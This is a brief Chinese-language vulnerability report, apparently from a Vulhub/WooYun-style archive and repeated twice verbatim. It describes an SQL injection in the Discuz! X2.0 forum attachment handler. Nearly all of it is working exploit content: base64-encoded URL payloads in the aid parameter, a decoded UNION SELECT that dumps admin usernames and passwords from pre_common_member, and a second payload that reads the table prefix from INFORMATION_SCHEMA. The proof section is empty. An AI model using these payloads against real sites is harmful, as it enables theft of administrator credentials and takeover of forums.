VULHUB ™

### 简要描述： ### 详细说明： DZ2.0直接暴管理账号密码（默认前缀的情况下） http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd 29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl rZSAnYWRtaW58eHx5%3D base64解码 1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like ‘admin|x|y 如果不是默认前缀 暴前缀EXP http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1 FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D ### 漏洞证明：

### 简要描述： ### 详细说明： DZ2.0直接暴管理账号密码（默认前缀的情况下） http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd 29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl rZSAnYWRtaW58eHx5%3D base64解码 1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like ‘admin|x|y 如果不是默认前缀 暴前缀EXP http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1 FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D ### 漏洞证明：